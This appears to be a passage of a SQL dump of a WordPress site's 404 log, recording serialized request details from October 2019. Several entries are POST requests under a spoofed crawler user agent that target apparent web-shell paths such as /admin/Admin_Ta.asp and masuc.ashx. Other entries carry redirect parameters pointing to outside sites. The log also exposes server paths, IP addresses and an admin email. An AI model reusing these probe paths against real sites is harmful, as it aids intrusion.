Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"218.207.137.253\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"218.207.137.253\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/gjxq/jpry/masuc.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHDJ0q-QPicCh3WFsYoLgAAAJc\";s:12:\"REDIRECT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"53696\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/gjxq/jpry/masuc.ashx\";s:10:\"SCRIPT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHDJ0q-QPicCh3WFsYoLgAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930919.5538\";s:12:\"REQUEST_TIME\";s:10:\"1571930919\";}}','notice','2019-10-24 15:28:41','2019-10-24 15:28:40',35272448,37076696,'http://bintara.com.my//gjxq/jpry/masuc.ashx',1,0,'218.207.137.253'),(28029,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"50912\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaR5W2fO-tVFZ234mVhRdQAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571060059.8918\";s:12:\"REQUEST_TIME\";s:10:\"1571060059\";}}','notice','2019-10-14 13:34:21','2019-10-14 13:34:20',35034576,36843632,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(28028,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:149:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-glass-furniture-uv-bonded-products%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:147:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-glass-furniture-uv-bonded-products%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"50273\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaR5VWfO-tVFZ234mVhRcgAAAAs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571060053.323\";s:12:\"REQUEST_TIME\";s:10:\"1571060053\";}}','notice','2019-10-14 13:34:16','2019-10-14 13:34:13',35466616,37273888,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-glass-furniture-uv-bonded-products%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(29008,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.5155.400 QQBrowser/9.7.13231.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"207.182.24.98\";s:11:\"REMOTE_PORT\";s:5:\"48775\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XbHKxkq-QPicCh3WFsYtQgAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571932872.0653\";s:12:\"REQUEST_TIME\";s:10:\"1571932872\";}}','notice','2019-10-24 16:01:15','2019-10-24 16:01:12',35310208,37107480,'https://bintara.com.my/?page_id=18',1,0,'207.182.24.98'),(29006,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//gjxq/jpry/masuc.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"203.93.194.221\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"203.93.194.221\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/gjxq/jpry/masuc.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHDIEq-QPicCh3WFsYoKgAAAIg\";s:12:\"REDIRECT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"53507\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/gjxq/jpry/masuc.ashx\";s:10:\"SCRIPT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHDIEq-QPicCh3WFsYoKgAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930912.9265\";s:12:\"REQUEST_TIME\";s:10:\"1571930912\";}}','notice','2019-10-24 15:28:34','2019-10-24 15:28:33',35340120,37140816,'http://bintara.com.my//gjxq/jpry/masuc.ashx',1,0,'203.93.194.221'),(29005,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//gjxq/jpry/masuc.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"297\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"220.192.202.135\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"220.192.202.135\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/gjxq/jpry/masuc.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHDDEq-QPicCh3WFsYoIgAAAJE\";s:12:\"REDIRECT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"52654\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/gjxq/jpry/masuc.ashx\";s:10:\"SCRIPT_URL\";s:21:\"/gjxq/jpry/masuc.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHDDEq-QPicCh3WFsYoIgAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930892.8194\";s:12:\"REQUEST_TIME\";s:10:\"1571930892\";}}','notice','2019-10-24 15:28:14','2019-10-24 15:28:13',35265968,37062824,'http://bintara.com.my//gjxq/jpry/masuc.ashx',1,0,'220.192.202.135'),(29004,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//admin/Admin_Ta.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.242.255.148\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.242.255.148\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/admin/Admin_Ta.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/admin/Admin_Ta.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHDAUq-QPicCh3WFsYoHgAAAJg\";s:12:\"REDIRECT_URL\";s:19:\"/admin/Admin_Ta.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"52654\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/admin/Admin_Ta.asp\";s:10:\"SCRIPT_URL\";s:19:\"/admin/Admin_Ta.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHDAUq-QPicCh3WFsYoHgAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930881.8883\";s:12:\"REQUEST_TIME\";s:10:\"1571930881\";}}','notice','2019-10-24 15:28:03','2019-10-24 15:28:02',35269320,37075656,'http://bintara.com.my//admin/Admin_Ta.asp',1,0,'61.242.255.148'),(29003,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//admin/Admin_Ta.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"59.53.73.204\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"59.53.73.204\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/admin/Admin_Ta.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/admin/Admin_Ta.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHC@0q-QPicCh3WFsYoGwAAAIA\";s:12:\"REDIRECT_URL\";s:19:\"/admin/Admin_Ta.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"52279\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/admin/Admin_Ta.asp\";s:10:\"SCRIPT_URL\";s:19:\"/admin/Admin_Ta.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHC@0q-QPicCh3WFsYoGwAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930875.3896\";s:12:\"REQUEST_TIME\";s:10:\"1571930875\";}}','notice','2019-10-24 15:27:58','2019-10-24 15:27:55',35736320,37540280,'http://bintara.com.my//admin/Admin_Ta.asp',1,0,'59.53.73.204'),(29002,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//a_user/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"122.48.120.111\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"122.48.120.111\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/a_user/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/a_user/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHC6Uq-QPicCh3WFsYoDQAAAJI\";s:12:\"REDIRECT_URL\";s:17:\"/a_user/index.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"51469\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/a_user/index.asp\";s:10:\"SCRIPT_URL\";s:17:\"/a_user/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHC6Uq-QPicCh3WFsYoDQAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571930857.684\";s:12:\"REQUEST_TIME\";s:10:\"1571930857\";}}','notice','2019-10-24 15:27:39','2019-10-24 15:27:38',35342336,37144832,'http://bintara.com.my//a_user/index.asp',1,0,'122.48.120.111'),(29001,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//Admin/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"687\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 